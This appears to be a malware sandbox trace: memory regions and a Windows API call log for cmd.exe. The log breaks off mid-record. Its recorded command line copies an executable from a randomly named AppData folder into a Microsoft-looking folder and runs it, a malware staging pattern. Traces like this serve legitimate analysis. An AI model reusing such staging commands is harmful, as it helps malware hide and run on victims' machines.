region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1082 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1083 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1084 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1085 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1086 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1087 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1088 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1089 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1090 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1409 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1410 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1411 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1412 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1413 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1414 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1415 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1416 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1417 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1418 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1419 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1420 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1421 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1422 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1423 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1424 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1425 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1426 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1427 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1428 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1429 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1430 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1431 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1432 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 1475 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 18 os_tid = 0xb6c [0098.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7d4 | out: lpSystemTimeAsFileTime=0x30f7d4*(dwLowDateTime=0x78b518e0, dwHighDateTime=0x1d440a9)) [0098.487] GetCurrentProcessId () returned 0xb68 [0098.487] GetCurrentThreadId () returned 0xb6c [0098.487] GetTickCount () returned 0x2384e [0098.487] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7cc | out: lpPerformanceCount=0x30f7cc*=15527602188) returned 1 [0098.488] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0098.488] __set_app_type (_Type=0x1) [0098.488] __p__fmode () returned 0x76b331f4 [0098.488] __p__commode () returned 0x76b331fc [0098.488] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0098.488] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0098.488] GetCurrentThreadId () returned 0xb6c [0098.488] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb6c) returned 0x38 [0098.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0098.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.488] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.488] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f764 | out: phkResult=0x30f764*=0x0) returned 0x2 [0098.489] VirtualQuery (in: lpAddress=0x30f79b, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0098.489] GetConsoleOutputCP () returned 0x1b5 [0098.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.489] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0098.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0098.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0098.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.490] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0098.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.490] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0098.490] GetEnvironmentStringsW () returned 0x4d03f8* [0098.490] FreeEnvironmentStringsW (penv=0x4d03f8) returned 1 [0098.491] GetEnvironmentStringsW () returned 0x4d03f8* [0098.491] FreeEnvironmentStringsW (penv=0x4d03f8) returned 1 [0098.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6d4 | out: phkResult=0x30e6d4*=0x40) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0xa8, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x0, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegCloseKey (hKey=0x40) returned 0x0 [0098.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6d4 | out: phkResult=0x30e6d4*=0x40) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x0, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x9, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x9, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x9, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.492] RegCloseKey (hKey=0x40) returned 0x0 [0098.492] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634b [0098.492] srand (_Seed=0x5b88634b) [0098.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0098.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0098.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d1b58, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0098.493] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.493] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.493] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.493] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0098.493] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0098.493] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0098.493] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0098.493] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0098.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0098.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0098.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0098.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0098.493] GetEnvironmentStringsW () returned 0x4d2548* [0098.493] FreeEnvironmentStringsW (penv=0x4d2548) returned 1 [0098.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0098.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0098.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0098.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0098.494] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0098.494] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0098.494] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0098.494] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0098.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f4a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f4a0, lpFilePart=0x30f49c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f49c*="Desktop") returned 0x18 [0098.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f21c | out: lpFindFileData=0x30f21c) returned 0x4d0bd8 [0098.494] FindClose (in: hFindFile=0x4d0bd8 | out: hFindFile=0x4d0bd8) returned 1 [0098.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f21c | out: lpFindFileData=0x30f21c) returned 0x4d0bd8 [0098.494] FindClose (in: hFindFile=0x4d0bd8 | out: hFindFile=0x4d0bd8) returned 1 [0098.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f21c | out: lpFindFileData=0x30f21c) returned 0x4d0bd8 [0098.495] FindClose (in: hFindFile=0x4d0bd8 | out: hFindFile=0x4d0bd8) returned 1 [0098.495] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.495] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0098.495] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0098.495] GetEnvironmentStringsW () returned 0x4d03f8* [0098.495] FreeEnvironmentStringsW (penv=0x4d03f8) returned 1 [0098.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.496] GetConsoleOutputCP () returned 0x1b5 [0098.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.496] GetUserDefaultLCID () returned 0x409 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5e0, cchData=128 | out: lpLCData="0") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5e0, cchData=128 | out: lpLCData="0") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f5e0, cchData=128 | out: lpLCData="1") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0098.497] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0098.498] GetConsoleTitleW (in: lpConsoleTitle=0x4c0a58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.498] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0098.498] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0098.498] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0098.499] _wcsicmp (_String1="type", _String2=")") returned 75 [0098.499] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0098.499] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0098.499] _wcsicmp (_String1="IF", _String2="type") returned -11 [0098.499] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0098.499] _wcsicmp (_String1="REM", _String2="type") returned -2 [0098.499] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0098.503] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 68 [0098.503] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 68 [0098.503] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 71 [0098.503] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 71 [0098.503] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 80 [0098.503] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 80 [0098.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.506] GetFileType (hFile=0x7) returned 0x2 [0098.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f474 | out: lpMode=0x30f474) returned 1 [0098.607] _dup (_FileHandle=1) returned 3 [0098.608] _close (_FileHandle=1) returned 0 [0098.608] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", _String2="con") returned -53 [0098.608] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f444, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0098.608] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0098.608] GetConsoleTitleW (in: lpConsoleTitle=0x30f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.609] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0098.609] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0098.609] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0098.609] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0098.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.609] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x30edd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30edd8) returned 0x4d20b8 [0098.610] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0098.610] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0098.610] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0098.610] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30dce4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0098.610] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] GetFileType (hFile=0x54) returned 0x1 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x30dd3c | out: lpFileSizeHigh=0x30dd3c*=0x0) returned 0x7d600 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] 